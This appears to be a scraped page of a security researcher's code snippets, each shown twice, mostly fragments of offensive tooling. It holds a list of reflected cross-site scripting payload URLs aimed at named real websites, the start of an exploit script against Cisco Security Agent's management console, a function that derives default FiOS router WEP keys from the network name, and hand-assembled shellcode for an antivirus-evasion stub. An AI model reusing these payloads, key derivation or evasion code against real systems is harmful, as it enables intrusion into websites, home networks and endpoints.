Gerry Eisenhaur gerry

## msf-rex.gemspec
# Drop this into msf3 root-dir as 'msf-rex.gemspec'.
#
# Create gem with:
#   $ gem build msf-rex.gemspec
#
# Note there's already a "rex" rubygem, which is why we used 'msf-rex'.
# We can still "require 'rex'" though.


$: << 'lib'

## st_upload-exploit.py
#!/usr/bin/env python
# Thu 24 Jun 2010 04:20:52 AM EDT
import httplib
import mimetools
import StringIO

_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"

## XSS Dump
https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E
http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4
https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E
https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29
https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;//
http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22
http://www.webroot.com/En_US/search-results.html?q=');alert('gerry
http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware
http://products.verizonwireless.com/index.aspx?';alert(1)//

## htl_extract.py
#!/usr/bin/env python
"""htl_extract.py, Extracts the embedded source code from Cisco Security Agent Management Console.
Gerry <gerry@hiredhacker.com>
"""
import os
import sys
import struct
import pefile
from itertools import takewhile

## fios-wep.py
# Calculate the lower 6 bytes of the WEP key, the upper 4 are from the MAC
# address of the router (1801 or 1F90)

def get_key(essid):
    key = sum(int(val, 36) * (36**idx) for idx, val in enumerate(essid))
    return hex(key)

# >>> print get_key("E3X12")
# 0x349fca

## evasions.py
offset = 0x1000 - len(scode) - 32
tls_header  = "\xE8\x00\x00\x00\x00"                 # CALL $+5
tls_header += "\x5E"                                 # POP ESI
tls_header += "\x83\xC6\x1B"                         # ADD ESI, 0x1b
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00"         # MOV EDI,DWORD PTR FS:[30]
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
tls_header += "\x57"                                 # PUSH EDI
tls_header += "\xFC"                                 # CLD
tls_header += "\xF3\xA4"                             # REP MOVSB [EDI], [ESI]
	# Drop this into msf3 root-dir as 'msf-rex.gemspec'.
	#
	# Create gem with:
	# $ gem build msf-rex.gemspec
	#
	# Note there's already a "rex" rubygem, which is why we used 'msf-rex'.
	# We can still "require 'rex'" though.


	$: << 'lib'
	#!/usr/bin/env python
	# Thu 24 Jun 2010 04:20:52 AM EDT
	import httplib
	import mimetools
	import StringIO

	_boundary = mimetools.choose_boundary()
	_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
	_csamc = "192.168.0.108"
	https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E
	http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4
	https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E
	https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29
	https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;//
	http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22
	http://www.webroot.com/En_US/search-results.html?q=');alert('gerry
	http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware
	http://products.verizonwireless.com/index.aspx?';alert(1)//
	#!/usr/bin/env python
	"""htl_extract.py, Extracts the embedded source code from Cisco Security Agent Management Console.
	Gerry <gerry@hiredhacker.com>
	"""
	import os
	import sys
	import struct
	import pefile
	from itertools import takewhile
	# Calculate the lower 6 bytes of the WEP key, the upper 4 are from the MAC
	# address of the router (1801 or 1F90)

	def get_key(essid):
	key = sum(int(val, 36) * (36**idx) for idx, val in enumerate(essid))
	return hex(key)

	# >>> print get_key("E3X12")
	# 0x349fca
	offset = 0x1000 - len(scode) - 32
	tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5
	tls_header += "\x5E" # POP ESI
	tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b
	tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
	tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30]
	tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
	tls_header += "\x57" # PUSH EDI
	tls_header += "\xFC" # CLD
	tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI]